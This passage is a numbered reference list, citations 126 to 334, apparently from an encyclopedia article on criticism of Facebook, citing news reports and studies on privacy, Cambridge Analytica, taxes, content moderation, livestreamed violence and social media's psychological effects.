  126. Achohido, Byron (November 15, 2011). "Facebook tracking is under scrutiny". USA Today. Gannett Company. Archived from the original on November 16, 2011. Retrieved June 18, 2017.
  127. "Belgian court orders Facebook to stop tracking non-members". The Guardian. Guardian Media Group. November 10, 2015. Retrieved June 18, 2017.
  128. Baraniuk, Chris (December 2, 2015). "Facebook bows to Belgian privacy ruling over cookies". BBC News. BBC. Retrieved June 18, 2017.
  129. Statt, Nick (December 2, 2015). "After privacy ruling, Facebook now requires Belgium users to log in to view pages". The Verge. Vox Media. Retrieved June 18, 2017.
  130. Anson, Alexander (November 12, 2012). "Facebook Stalking Statistics 2012". ansonalex.com. Anson, Alexander. Retrieved October 26, 2014.
  131. "Stalking Statistics". Violence Prevention and Action Center. John Carroll University. Retrieved October 26, 2014.
  132. Westlake, E. J. (2008), "Friend Me if You Facebook: Generation Y and Performative Surveillance", The Drama Review, 52 (4): 21–40, doi:10.1162/dram.2008.52.4.21
  133. Steel, Emily; Fowler, Geoffrey A. (October 18, 2010). "Facebook in Privacy Breach". The Wall Street Journal. Dow Jones & Company. Retrieved June 4, 2017.
  134. Takahashi, Dean (October 17, 2010). "WSJ reports Facebook apps — including banned LOLapps games — transmitted private user data". VentureBeat. Retrieved June 4, 2017.
  135. "Suspending Cambridge Analytica and SCL Group from Facebook | Facebook Newsroom". Retrieved March 20, 2018.
  136. "How Facebook Made Its Cambridge Analytica Data Crisis Even Worse". Bloomberg.com. March 20, 2018. Retrieved March 20, 2018.
  137. "Academic behind Facebook breach says political influence was..." Reuters. March 21, 2018. Retrieved March 21, 2018.
  138. Solon, Olivia (April 4, 2018). "Facebook says Cambridge Analytica may have gained 37m more users' data". the Guardian. Retrieved April 6, 2018.
  139. Wong, Julia Carrie (March 23, 2018). "Elon Musk joins #DeleteFacebook effort as Tesla and SpaceX pages vanish". theguardian.com. Retrieved March 24, 2018.
  140. Green, Dr. Jemma. "#DeleteFacebook Highlights The Benefits Of Blockchain". forbes.com. Retrieved March 24, 2018.
  141. Grind, Kirsten (March 22, 2018). "Next Worry for Facebook: Disenchanted Users". Wsj.com. Retrieved March 25, 2018.
  142. Tobias, Manuela (March 22, 2018). "Comparing Facebook data use by Obama, Cambridge Analytica". PolitiFact. Retrieved May 2, 2018.
  143. Schouten, Fredreka (March 20, 2018). "Obama 2012 team: We didn't break Facebook rules in our campaign". USA Today. Retrieved May 2, 2018.
  144. Rogers, James (March 20, 2018). "Obama 2012 campaign 'sucked' data from Facebook, former official says". Fox News. Retrieved May 2, 2018.
  145. Sullivan, Mark (March 20, 2018). "Obama Campaign's "Targeted Share" App Also Used Facebook Data From Millions Of Unknowing Users". Fast Company. Retrieved May 2, 2018.
  146. Rutenberg, Jim (June 20, 2013). "The Obama Campaign's Digital Masterminds Cash In". The New York Times. Retrieved May 2, 2018.
  147. Friedman, Matt (March 21, 2013). "Bill to ban companies from asking about job candidates' Facebook accounts is headed to governor". NJ.com. Advance Digital. Retrieved June 8, 2017.
  148. N. Landers, Richard (2016). Social Media in Employee Selection and Recruitment: theory, practice, and current challenges. Switzerland: Springer international publishing. pp. 19–20. ISBN 9783319299891.
  149. "Fourth Amendment Activities". uscourts.gov. Retrieved March 24, 2018.
  150. Dave., Awl (2011). Facebook me! : a guide to socializing, sharing, and promoting on Facebook (2nd ed.). Berkeley, CA: Peachpit Press. ISBN 9780321743732. OCLC 699044722.
  151. "Why Parents Help Their Children Lie to Facebook About Age: Unintended Consequences of the Children's Online Privacy Protection Act". Journalist's Resource.org.
  152. Schweitzer, Sarah (October 6, 2005). "Fisher College expels student over website entries". The Boston Globe.
  153. O'Toole, Catie (January 24, 2010). "Seventh-grade North Syracuse student suspended, 25 others disciplined for Facebook page about teacher". The Post-Standard. Retrieved January 25, 2010.
  154. Peluchette, Joy; Karl, Katherine (2010). "Examining Students' Intended Image on Facebook: "what were they Thinking?!"". Journal of Education for Business. 85 (1): 30–7. doi:10.1080/08832320903217606.
  155. Bugeja, Michael (January 3, 2006). "Facing the Facebook". The Chronicle of Higher Education. Archived from the original on February 20, 2008. Retrieved October 6, 2006.
  156. Bugeja, Michael J. (January 26, 2007). "Distractions in the Wireless Classroom". Chronicle Careers. The Chronicle of Higher Education. Retrieved June 26, 2007.
  157. National Association of Campus Activities (July 12, 2006). "Facing the Facebook". Archived from the original on June 27, 2006. Retrieved October 6, 2006.
  158. Association for Education in Journalism and Communication (2006). "Facing the Facebook: Administrative Issues Involving Social Networks". Archived from the original on October 8, 2007. Retrieved October 6, 2006.
  159. EDUCAUSE Learning Institute (2006). "7 Things You Should Know About Facebook". Archived from the original on September 16, 2006. Retrieved October 6, 2006.
  160. Junco, R (2012). "Too much face and not enough books: The relationship between multiple indices of Facebook use and academic performance" (PDF). Computers in Human Behavior. 28 (1): 187–198. doi:10.1016/j.chb.2011.08.026.
  161. Junco, R (2012). "The relationship between frequency of Facebook use, participation in Facebook activities, and student engagement" (PDF). Computers & Education. 58 (1): 162–171. doi:10.1016/j.compedu.2011.08.004.
  162. Heiberger, Greg and Harper, Ruth (2008). Have you Facebooked Astin lately? In Reynol Junco and Dianne M. Timm (Eds). Using Emerging Technologies to Enhance Student Engagement. San Francisco: Jossey-Bass.
  163. Cotten, Shelia R. (2008). Students' technology use and the impacts on well-being. In Reynol Junco and Dianne M. Timm (Eds). Using Emerging Technologies to Enhance Student Engagement. San Francisco: Jossey-Bass.
  164. Kirschner, P. A.; Karpinski, A. C. (2010). "Facebook and academic performance". Computers in Human Behavior. 26 (6): 1237–1245. doi:10.1016/j.chb.2010.03.024. hdl:10818/20216. Archived from the original on December 27, 2011. Retrieved October 31, 2017.
  165. Kolek, E. A., & Saunders, D. (2008). Online disclosure: An empirical examination of undergraduate Facebook profiles. NASPA Journal, 45(1), 1–25.
  166. Hargittai, Eszter; More, Eian; Pasek, Josh (April 26, 2009). "Facebook and academic performance: Reconciling a media sensation with data". First Monday. 14 (5). doi:10.5210/fm.v14i5.2498. Retrieved January 30, 2019.
  167. Hern, Alex (December 14, 2018). "Facebook admits bug allowed apps to see hidden photos". Theguardian.com. Retrieved December 15, 2018.
  168. Dance, Gabriel J. X.; LaForgia, Michael; Confessore, Nicholas (December 18, 2018). "As Facebook Raised a Privacy Wall, It Carved an Opening for Tech Giants". Nytimes.com.
  169. Hern, Alex (December 19, 2018). "Facebook users cannot avoid location-based ads, investigation finds". Theguardian.com.
  170. "Say No To The Dress". BuzzFeed News. Retrieved January 22, 2019.
  171. "Facebook reportedly received users' sensitive health data from apps: "It's incredibly dishonest"". Cbsnews.com. Retrieved February 23, 2019.
  172. Doward, Jamie; Soni, Raj (February 23, 2019). "Facebook attacked over app that reveals period dates of its users". Theguardian.com. Retrieved February 23, 2019.
  173. Schechner, Sam; Secada, Mark (February 22, 2019). "You Give Apps Sensitive Personal Information. Then They Tell Facebook". Wsj.com. Retrieved February 23, 2019.
  174. Statt, Nick (February 22, 2019). "App makers are sharing sensitive personal information with Facebook but not telling users". The Verge. Retrieved February 23, 2019.
  175. Reuters (February 23, 2019). "'Outrageous abuse of privacy': New York orders inquiry into Facebook data use". Theguardian.com. Retrieved February 23, 2019.
  176. "Revealed: Facebook's global lobbying against data privacy laws - Technology - The Guardian". March 2, 2019. Archived from the original on March 2, 2019. Retrieved March 3, 2019.
  177. Laura Kayali (January 29, 2019). "Inside Facebook's fight against European regulation". politico.eu. Retrieved May 3, 2019.
  178. "Facebook Stored Millions of Passwords in Plaintext—Change Yours Now". Wired.com. March 21, 2019. Retrieved March 23, 2019.
  179. Hern, Alex (March 21, 2019). "Facebook stored hundreds of millions of passwords unprotected". the Guardian. Retrieved March 22, 2019.
  180. "Facebook now says its password leak affected 'millions' of Instagram users". TechCrunch. April 18, 2019. Retrieved April 18, 2019.
  181. "Hungary competition authority fines Facebook $4 million". The Seattle Times. December 6, 2019. Retrieved December 14, 2019.
  182. "Is Facebook listening to me? Why those ads appear after you talk about things". USA TODAY. June 28, 2019. Retrieved June 28, 2019.
  183. "Facebook isn't secretly listening to your conversations, but the truth is much more disturbing". NEWS ATLAS. September 6, 2019. Retrieved September 6, 2019.
  184. Hough, Andrew (April 8, 2011). "Student 'addiction' to technology 'similar to drug cravings', study finds". London: Telegraph Media Group.
  185. "Facebook and Twitter 'more addictive than tobacco and alcohol'". London: Telegraph Media Group. February 1, 2012.
  186. Edwards, Ashton (August 1, 2014). "Facebook goes down for 30 minutes, 911 calls pour in". Fox13. Retrieved August 2, 2016.
  187. Lenhart, Amanda (April 9, 2015). "Teens, Social Media & Technology Overview 2015". Pew Research Center. Retrieved July 8, 2020.
  188. Turel, Ofir; Bechara, Antoine (2016). "Social Networking Site Use While Driving: ADHD and the Mediating Roles of Stress, Self-Esteem and Craving". Frontiers in Psychology. 7. Frontiers Media. p. 455. doi:10.3389/fpsyg.2016.00455. PMID 27065923. Retrieved July 6, 2020.
  189. Settanni, Michele; Marengo, Davide; Fabris, Matteo Angelo; Longobardi, Claudio (2018). "The interplay between ADHD symptoms and time perspective in addictive social media use: A study of adolescent Facebook users". Children and Youth Services Review. 89. Elsevier. pp. 165–170. doi:10.1016/j.childyouth.2018.04.031.
  190. Savage, Michael (January 26, 2019). "Health secretary tells social media firms to protect children after girl's death". The Guardian. Retrieved January 30, 2019.
  191. Adams, Richard (January 30, 2019). "Social media urged to take 'moment to reflect' after girl's death". The Guardian. Retrieved January 30, 2019.
  192. "Potential for Facebook addiction and consequences". July 15, 2012.
  193. "The Anti-Social Network". Slate.com. January 26, 2011.
  194. "How Facebook Breeds Jealousy". Discovery.com. February 10, 2010.
  195. "Study: Facebook makes lovers jealous". Cnet.com. August 11, 2009.
  196. "Jealous much? MySpace, Facebook can spark it". NBC News. July 31, 2007.
  197. "Facebook Causes Jealousy, Hampers Romance, Study Finds". University of Guelph. February 13, 2007.
  198. "Facebook jealousy sparks asthma attacks in dumped boy". Usatoday.com. November 19, 2010.
  199. Hanna Krasnova; Helena Wenninger; Thomas Widjaja; Peter Buxmann (January 23, 2013). "Envy on Facebook: A Hidden Threat to Users' Life Satisfaction?" (PDF). 11th International Conference on Wirtschaftsinformatik, February 27 – March 1, 2013, Leipzig, Germany. Archived from the original (PDF) on June 1, 2014. Retrieved June 13, 2014.
  200. "Facebook use 'makes people feel worse about themselves'". BBC News. August 15, 2013. Retrieved September 4, 2013.
  201. Myung Suh Lim; Junghyun Kim (June 4, 2018). "Facebook users' loneliness based on different types of interpersonal relationships: Links to grandiosity and envy". Information Technology & People. ISSN 0959-3845.
  202. "Divorce cases get the Facebook factor". MEN Media. January 19, 2011. Retrieved March 13, 2012.
  203. "Facebook's Other Top Trend of 2009: Divorce". Network World. December 22, 2009. Archived January 12, 2012, at the Wayback Machine. Retrieved March 13, 2012.
  204. "Facebook to Blame for Divorce Boom". Fox News. April 12, 2010. Archived from the original on April 15, 2010. Retrieved January 3, 2012.
  205. "Facebook is divorce lawyers' new best friend". MSNBC. June 28, 2010. Retrieved March 13, 2012.
  206. "Facebook flirting triggers divorces". The Times Of India. January 1, 2012.
  207. Clayton, Russell B.; Nagurney, Alexander; Smith, Jessica R. (June 7, 2013). "Cheating, Breakup, and Divorce: Is Facebook Use to Blame?". Cyberpsychology, Behavior, and Social Networking. 16 (10): 717–720. doi:10.1089/cyber.2012.0424. ISSN 2152-2715. PMID 23745615.
  208. Utz, Sonja; Beukeboom, Camiel J. (July 1, 2011). "The Role of Social Network Sites in Romantic Relationships: Effects on Jealousy and Relationship Happiness". Journal of Computer-Mediated Communication. 16 (4): 511–527. doi:10.1111/j.1083-6101.2011.01552.x. ISSN 1083-6101.
  209. Tokunaga, Robert S. (2011). "Social networking site or social surveillance site? Understanding the use of interpersonal electronic surveillance in romantic relationships". Computers in Human Behavior. 27 (2): 705–713. doi:10.1016/j.chb.2010.08.014.
  210. Muise, Amy; Christofides, Emily; Desmarais, Serge (April 15, 2009). "More Information than You Ever Wanted: Does Facebook Bring Out the Green-Eyed Monster of Jealousy?". CyberPsychology & Behavior. 12 (4): 441–444. doi:10.1089/cpb.2008.0263. ISSN 1094-9313. PMID 19366318.
  211. Kerkhof, Peter; Finkenauer, Catrin; Muusses, Linda D. (April 1, 2011). "Relational Consequences of Compulsive Internet Use: A Longitudinal Study Among Newlyweds" (PDF). Human Communication Research. 37 (2): 147–173. doi:10.1111/j.1468-2958.2010.01397.x. hdl:1871/35795. ISSN 1468-2958.
  212. Papp, Lauren M.; Danielewicz, Jennifer; Cayemberg, Crystal (October 11, 2011). ""Are We Facebook Official?" Implications of Dating Partners' Facebook Use and Profiles for Intimate Relationship Satisfaction". Cyberpsychology, Behavior, and Social Networking. 15 (2): 85–90. doi:10.1089/cyber.2011.0291. ISSN 2152-2715. PMID 21988733.
  213. "Does Facebook Stress You Out?". Webpronews.com. February 17, 2010. Archived from the original on February 18, 2011.
  214. Maier, C.; Laumer, S.; Eckhardt, A.; Weitzel, T. (2012). "Online Social Networks as a Source and Symbol of Stress: An Empirical Analysis". Proceedings of the 33rd International Conference on Information Systems (ICIS), Orlando, FL.
  215. Maier, C.; Laumer, S.; Eckhardt, A.; Weitzel, T. (2014). "Giving too much Social Support: Social Overload on Social Networking Sites". European Journal of Information Systems. 24: 447–464. doi:10.1057/ejis.2014.3.
  216. McCain, Jessica L.; Campbell, W. Keith (2018). "Narcissism and Social Media Use: A Meta-Analytic Review". Psychology of Popular Media Culture. 7 (3). American Psychological Association. pp. 308–327. doi:10.1037/ppm0000137. Retrieved June 9, 2020.
  217. Gnambs, Timo; Appel, Markus (2018). "Narcissism and Social Networking Behavior: A Meta-Analysis". Journal of Personality. 86 (2). Wiley-Blackwell. pp. 200–212. doi:10.1111/jopy.12305. PMID 28170106. Retrieved June 9, 2020.
  218. Brailovskaia, Julia; Bierhoff, Hans-Werner (2020). "The Narcissistic Millennial Generation: A Study of Personality Traits and Online Behavior on Facebook". Journal of Adult Development. 27 (1). Springer Science+Business Media. pp. 23–35. doi:10.1007/s10804-018-9321-1. Retrieved June 9, 2020.
  219. Casale, Silvia; Banchi, Vanessa (2020). "Narcissism and problematic social media use: A systematic literature review". Addictive Behaviors Reports. 11. Elsevier. doi:10.1016/j.abrep.2020.100252. Retrieved June 9, 2020.
  220. Lukianoff, Greg; Haidt, Jonathan (2018). The Coddling of the American Mind: How Good Intentions and Bad Ideas Are Setting Up a Generation for Failure. New York: Penguin Press. p. 147. ISBN 978-0735224896.
  221. Lee, Sangwon; Xenos, Michael (2019). "Social distraction? Social media use and political knowledge in two U.S. Presidential elections". Computers in Human Behavior. 90: 18–25. doi:10.1016/j.chb.2018.08.006.
  222. Lukianoff, Greg; Haidt, Jonathan (2018). The Coddling of the American Mind: How Good Intentions and Bad Ideas Are Setting Up a Generation for Failure. New York: Penguin Press. pp. 126–132. ISBN 978-0735224896.
  223. File, Thom (May 2013). Computer and Internet Use in the United States (PDF) (Report). Current Population Survey Reports. Washington, D.C.: U.S. Census Bureau. Retrieved February 11, 2020.
  224. Haidt, Jonathan; Rose-Stockwell, Tobias (2019). "The Dark Psychology of Social Networks". The Atlantic. 324 (6). Emerson Collective. pp. 57–60. Retrieved June 11, 2020.
  225. Gregory, Andy (November 7, 2019). "More than a third of millennials approve of communism, YouGov poll indicates". The Independent. Independent Digital News & Media Ltd. Retrieved June 11, 2020.
  226. Saad, Lydia (November 25, 2019). "Socialism as Popular as Capitalism Among Young Adults in U.S." Gallup. Retrieved June 11, 2020.
  227. Bromley, Alanna (2011). "Are social networking sites breeding antisocial young people?" (PDF). Journal of Digital Research and Publishing.
  228. "Students Take On Cyberbullying". YouTube.
  229. Baron, Naomi S. (2007). "My Best Day: Presentation of Self and Social Manipulation in Facebook and IM" (PDF). Archived from the original (PDF) on May 23, 2013.
  230. "A new addiction for teacher candidates: social networks" (PDF). The Turkish Online Journal of Educational Technology. 11 (3). 2012.
  231. Turkle, Sherry (2011): Alone Together. Why We Expect More from Technology and Less from Each Other. New York: Basic Books.
  232. Robert M. Bond; Christopher J. Fariss; Jason J. Jones; Adam D. I. Kramer; Cameron Marlow; Jaime E. Settle; James H. Fowler (2012). "A 61-million-person experiment in social influence and political mobilization". Nature. 489 (7415): 295–298. doi:10.1038/nature11421. PMC 3834737. PMID 22972300.
  233. Robert Booth (2014). "Facebook reveals news feed experiment to control emotions". The Guardian. Retrieved June 30, 2014.
  234. Adam D. I. Kramer; Jamie E. Guillory; Jeffrey T. Hancock (2014). "Experimental evidence of massive-scale emotional contagion through social networks". Proceedings of the National Academy of Sciences of the United States of America. 111 (24): 8788–8790. doi:10.1073/pnas.1320040111. PMC 4066473. PMID 24889601.
  235. "Facebook update". Retrieved July 14, 2019.(subscription required)
  236. David Goldman (July 2, 2014). "Facebook still won't say 'sorry' for mind games experiment". CNNMoney. Retrieved July 3, 2014.
  237. Guynn, Jessica (July 3, 2014). "Privacy watchdog files complaint over Facebook study". USA Today. USA Today. Retrieved July 5, 2014.
  238. Grohol, John. "Emotional Contagion on Facebook? More Like Bad Research Methods". Psych Central. PsychCentral. Retrieved July 12, 2014.
  239. Rudder, Christian (July 28, 2014). "We experiment on human beings". okcupid.com. Archived from the original on January 23, 2015. Retrieved July 14, 2019.
  240. Grimmelmann, James (September 23, 2014). "Illegal, immoral, and mood-altering: How Facebook and OkCupid broke the law when they experimented on users". Retrieved September 24, 2014.
  241. "Facebook's 'experiment' was socially irresponsible". The Guardian. July 1, 2014. Retrieved August 4, 2014.
  242. Neate, Rupert (December 23, 2012). "Facebook paid £2.9m tax on £840m profits made outside US, figures show". The Guardian. Retrieved October 25, 2016.
  243. "Paradise Papers reveal hidden wealth of global elite". The Express Tribune. November 6, 2017.
  244. van Noort, Wouter (November 11, 2017). "Belastingontwijking is simpel op te lossen" [Tax avoidance can easily be solved]. NRC Handelsblad (in Dutch). Retrieved July 14, 2019. The quote, as heading of the article, comes from the French economist Gabriel Zucman.
  245. "Facebook paid £4,327 corporation tax in 2014". Bbc.co.uk. October 12, 2015. Retrieved October 25, 2016.
  246. Tang, Paul (September 2017). "EU Tax Revenue Loss from Google and Facebook" (PDF).
  247. 26 U.S.C. § 7602.
  248. Fiegerman, Seth (July 7, 2016). "Facebook is being investigated by the IRS". CNN.
  249. United States of America v. Facebook, Inc. and Subsidiaries, case no. 16-cv-03777, U.S. District Court for the Northern District of California (San Francisco Div.).
  250. "Facebook paid just €30m tax in Ireland despite earning €12bn". Irish Indepdenent. November 29, 2017.
  251. "Facebook Ireland pays tax of just €30m on €12.6bn". Irish Examiner. November 29, 2017.
  252. David Ingram (April 18, 2018). "Exclusive: Facebook to put 1.5 billion users out of reach of new EU privacy law". Reuters.
  253. Peter Hamilton (November 28, 2018). "Facebook Ireland pays €38m tax on €18.7 billion of revenue channeled through Ireland in 2017". Irish Times. The social media giant channelled €18.7 billion in revenue through its Irish subsidiary, an increase of 48 per cent from the €12.6 billion recorded in 2016. While gross profit amounted to €18.1 billion, administrative expenses of €17.8 billion meant profit before tax increased 44 per cent to €251 million.
  254. Newton, Casey (February 25, 2019). "THE TRAUMA FLOOR: The secret lives of Facebook moderators in America". The Verge. Retrieved February 25, 2019.
  255. O'Connell, Jennifer (March 30, 2019). "Facebook's dirty work in Ireland: 'I had to watch footage of a person being beaten to death'". The Irish Times. Retrieved June 21, 2019.
  256. Newton, Casey (June 19, 2019). "Three Facebook moderators break their NDAs to expose a company in crisis". The Verge. Retrieved June 21, 2019.
  257. Wong, Queenie (June 19, 2019). "Murders and suicides: Here's who keeps them off your Facebook feed". CNET. Retrieved June 21, 2019.
  258. [254][255][256][257]
  259. Eadicicco, Lisa (June 19, 2019). "A Facebook content moderator died after suffering heart attack on the job". San Antonio Express-News. Retrieved June 20, 2019.
  260. Maiberg, Emanuel; Koebler, Jason; Cox, Joseph (September 24, 2018). "A Former Content Moderator Is Suing Facebook Because the Job Reportedly Gave Her PTSD". Vice. Retrieved June 21, 2019.
  261. Gray, Chris; Hern, Alex (December 4, 2019). "Ex-Facebook worker claims disturbing content led to PTSD". Guardian. Retrieved February 25, 2020.
  262. "Facebook sued by Tampa workers who say they suffered trauma from watching videos". Tampa Bay Times. Retrieved May 8, 2020.
  263. Leprince-Ringuet, Daphne. "Facebook's approach to content moderation slammed by EU commissioners". ZDNet. Retrieved February 19, 2020.
  264. Newton, Casey (May 12, 2020). "Facebook will pay $52 million in settlement with moderators who developed PTSD on the job". The Verge. Retrieved June 1, 2020.
  265. Allyn, Bobby (May 12, 2020). "In Settlement, Facebook To Pay $52 Million To Content Moderators With PTSD". NPR. Retrieved June 1, 2020.
  266. Paul, Kari (May 13, 2020). "Facebook to pay $52m for failing to protect moderators from 'horrors' of graphic content". The Guardian. Retrieved June 1, 2020.
  267. Streitfeld, David (March 21, 2018). "Welcome to Zucktown. Where Everything Is Just Zucky". The New York Times. Retrieved February 25, 2019.
  268. Pepitone, Julianne. "Facebook vs. Google fight turns nasty". CNNMoney. Retrieved February 23, 2019.
  269. Setalvad, Ariha (August 7, 2015). "Why Facebook's video theft problem can't last". The Verge. Vox Media. Retrieved May 29, 2017.
  270. Oremus, Will (July 8, 2015). "Facebook's Piracy Problem". Slate. The Slate Group. Retrieved May 29, 2017.
  271. Luckerson, Victor (August 28, 2015). "Facebook to Crack Down on Online Video Piracy". Time. Retrieved May 29, 2017.
  272. Constine, Josh (April 12, 2016). "Facebook launches video Rights Manager to combat freebooting". TechCrunch. AOL. Retrieved May 29, 2017.
  273. Kelion, Leo (May 1, 2013). "Facebook U-turn after charities criticise decapitation videos". BBC News. BBC. Retrieved June 3, 2017.
  274. Winter, Michael (October 21, 2013). "Facebook again allows violent videos, with caveat". USA Today. Gannett Company. Retrieved June 3, 2017.
  275. "Facebook pulls beheading video". The Telegraph. Telegraph Media Group. October 23, 2013. Retrieved June 3, 2017.
  276. Harrison, Virginia (October 23, 2013). "Outrage erupts over Facebook's decision on graphic videos". CNNMoney. CNN. Retrieved June 3, 2017.
  277. Gibbs, Samuel (January 13, 2015). "Facebook tackles graphic videos and photos with 'are you sure?' warnings". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  278. Kelion, Leo (January 13, 2015). "Facebook restricts violent video clips and photos". BBC News. BBC. Retrieved June 3, 2017.
  279. "Libya 'war crimes' videos shared online". BBC News. Retrieved September 23, 2019.
  280. "Libyan conflict: Suspected war crimes shared online". BBC Newsnight. Retrieved September 23, 2019.
  281. https://www.icc-cpi.int/CaseInformationSheets/al-werfalliEng.pdf
  282. "Community Standards | Facebook". www.facebook.com. Retrieved September 23, 2019.
  283. Mangalindan, JP (August 5, 2015). "Facebook launches live streaming, but only for famous people". Mashable. Retrieved June 3, 2017.
  284. Barrett, Brian (January 28, 2016). "Facebook Livestreaming Opens Up to Everyone With an iPhone". Wired. Condé Nast. Retrieved June 3, 2017.
  285. Newton, Casey (January 28, 2016). "Facebook rolls out live video streaming to everyone in the United States". The Verge. Vox Media. Retrieved June 3, 2017.
  286. Newton, Casey (December 3, 2015). "Facebook begins testing live video streaming for all users". The Verge. Vox Media. Retrieved June 3, 2017.
  287. Chrisafis, Angelique; Willsher, Kim (June 14, 2016). "French police officer and partner murdered in 'odious terrorist attack'". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  288. Madden, Justin (June 17, 2016). "Chicago man shot dead while live streaming on Facebook". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  289. Chaykowski, Kathleen (July 7, 2016). "Philando Castile's Death On Facebook Live Highlights Problems For Social Media Apps". Forbes. Retrieved June 3, 2017.
  290. McLaughlin, Eliott C.; Blau, Max; Vercammen, Paul (September 30, 2016). "Police: Man killed by officer pointed vaping device, not gun". CNN. Retrieved June 3, 2017.
  291. Berman, Mark; Hawkins, Derek (January 5, 2017). "Hate crime charges filed after 'reprehensible' video shows attack on mentally ill man in Chicago". The Washington Post. Nash Holdings. Retrieved June 3, 2017.
  292. Steele, Billy (March 22, 2017). "Dozens watched a Facebook Live stream of sexual assault (updated)". Engadget. AOL. Retrieved June 3, 2017.
  293. Gibbs, Samuel (April 25, 2017). "Facebook under pressure after man livestreams killing of his daughter". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  294. Solon, Olivia (January 27, 2017). "Why a rising number of criminals are using Facebook Live to film their acts". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  295. Solon, Olivia; Levin, Sam (January 6, 2017). "Facebook refuses to explain why live torture video wasn't removed sooner". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  296. Krasodomski-Jones, Alex (January 9, 2017). "Facebook has created a monster it cannot tame". CNN. Retrieved June 3, 2017.
  297. Bhattacharya, Ananya (June 18, 2016). "Facebook Live is becoming a gruesome crime scene for murders". Quartz. Atlantic Media. Retrieved June 3, 2017.
  298. Gibbs, Samuel (May 3, 2017). "Facebook Live: Zuckerberg adds 3,000 moderators in wake of murders". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  299. Murphy, Mike (May 3, 2017). "Facebook is hiring 3,000 more people to monitor Facebook Live for murders, suicides, and other horrific video". Quartz. Atlantic Media. Retrieved June 3, 2017.
  300. Ingram, David (May 3, 2017). "Facebook tries to fix violent video problem with 3,000 new workers". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  301. Peng, Tina (November 22, 2008). "Pro-anorexia groups spread to Facebook". Newsweek. Retrieved June 13, 2017.
  302. "Pro-anorexia site clampdown urged". BBC News. BBC. February 24, 2008. Retrieved June 13, 2017.
  303. Masciarelli, Alexis (January 9, 2009). "Anger at pro-Mafia groups on Facebook". France 24. France Médias Monde. Archived from the original on September 6, 2009. Retrieved June 13, 2017.
  304. Donadio, Rachel (January 20, 2009). "Italian authorities wary of Facebook tributes to Mafia". The New York Times International Edition. Archived from the original on January 24, 2009. Retrieved June 13, 2017.
  305. Pullella, Philip (January 12, 2009). "Pro-mafia Facebook pages cause alarm in Italy". Reuters. Thomson Reuters. Retrieved June 13, 2017.
  306. Krangel, Eric (February 11, 2009). "Italy Considering National Ban On Facebook, YouTube In Plan To Return To Dark Ages". Business Insider. Axel Springer SE. Retrieved June 13, 2017.
  307. Kington, Tom (February 16, 2009). "Italian bill aims to block mafia Facebook shrines". The Guardian. Guardian Media Group. Retrieved June 13, 2017.
  308. Nicole, Kristen (February 12, 2009). "Mafia Bosses Could Cause Italy's Blocking of Facebook". Adweek. Beringer Capital. Retrieved June 13, 2017.
  309. Oates, John (February 12, 2009). "Facebook hits back at Italian ban". The Register. Situation Publishing. Retrieved June 13, 2017.
  310. "Trolling: The Today Show Explores the Dark Side of the Internet", March 31, 2010. Retrieved April 4, 2010. Archived June 8, 2010, at the Wayback Machine
  311. s127 of the Communications Act 2003 of Great Britain. Retrieved July 13, 2011.
  312. Murder victim-mocking troll jailed, The Register, November 1, 2010. Retrieved July 13, 2011.
  313. Jade Goody website 'troll' from Manchester jailed, BBC, October 29, 2010. Retrieved July 13, 2011.
  314. Facebook troll Bradley Paul Hampson seeks bail, appeal against jail term, The Courier-Mail, April 20, 2011. Retrieved July 13, 2011.
  315. Facebook urged to ban teens from setting up tribute pages, The Australian, June 5, 2010. Retrieved July 13, 2011.
  316. Sherwell, Philip (October 16, 2011). "Cyber anarchists blamed for unleashing a series of Facebook 'rape pages'". Daily Telegraph. London. Retrieved May 22, 2012.
  317. "Facebook 'rape page' whitelisted and campaign goes global". Womensviewsonnews.org. Meanwhile, campaigns in other countries have begun, most notably in Canada with the Rape is no joke (RINJ) campaign, which has not only campaigned fiercely but has also put together a YouTube video.
  318. "Facebook Refuses To Remove Rape Pages..." Albuquerque Express. October 23, 2011. Archived from the original on September 3, 2017. Retrieved May 22, 2012.
  319. "Facebook Refuses to Remove 'Rape Pages' Linked to Australian, British Youth". International Business Times. October 18, 2011. Archived from the original on July 17, 2012. Retrieved May 22, 2012. O'Brien said the campaign is now focusing on Facebook advertisers telling them not to let their advertisements be posted on the "rape pages."
  320. Sara C Nelson (May 28, 2013). "#FBrape: Will Facebook Heed Open Letter Protesting 'Endorsement Of Rape & Domestic Violence'?". The Huffington Post UK. Retrieved May 29, 2013.
  321. Rory Carroll (May 29, 2013). "Facebook gives way to campaign against hate speech on its pages". The Guardian UK. London. Retrieved May 29, 2013.
  322. "Facebook criticised by NSPCC over baby ducking video clip". BBC News. June 5, 2015.
  323. "Facebook failed to remove sexualised images of children". BBC News. Retrieved March 9, 2017.
  324. "Facebook, Twitter and Google grilled by MPs over hate speech". BBC News. Retrieved March 14, 2017.
  325. Layug, Margaret Claire (July 3, 2017). "'Pastor Hokage' FB groups trading lewd photos of women exposed". GMA News. Retrieved July 8, 2017.
  326. Layug, Margaret Claire (July 5, 2017). "Victim of 'Pastor' FB reports harassment, indecent proposals". GMA News. Retrieved July 8, 2017.
  327. De Jesus, Julliane Love (July 6, 2017). "Hontiveros wants stiff penalties vs 'Pastor Hokage' FB groups". Philippine Daily Inquirer. Retrieved July 8, 2017.
  328. "When it comes to incitement, is Facebook biased against Israel? - Arab-Israeli Conflict - Jerusalem Post". Jpost.com. Retrieved December 16, 2018.
  329. JTA (September 27, 2016). "Facebook tightens ad policy after 'Jew hater' controversy — J". Jweekly.com. Retrieved September 29, 2017.
  330. Gagliardo-Silver, Victoria (March 29, 2019). "Instagram refuses to remove Alex Jones' anti-semitic post". The Independent. Retrieved March 30, 2019.
  331. "20,000 Israelis sue Facebook for ignoring Palestinian incitement". The Times of Israel. October 27, 2015. Retrieved July 15, 2016.
  332. "Israel: Facebook's Zuckerberg has blood of slain Israeli teen on his hands". The Times of Israel. July 2, 2016. Retrieved July 15, 2016.
  333. Wittes, Benjamin; Bedell, Zoe (July 12, 2016). "Facebook, Hamas, and Why a New Material Support Suit May Have Legs". Lawfare.
  334. Pileggi, Tamar (July 11, 2016). "US terror victims seek $1 billion from Facebook for Hamas posts". The Times of Israel. Retrieved July 15, 2016.
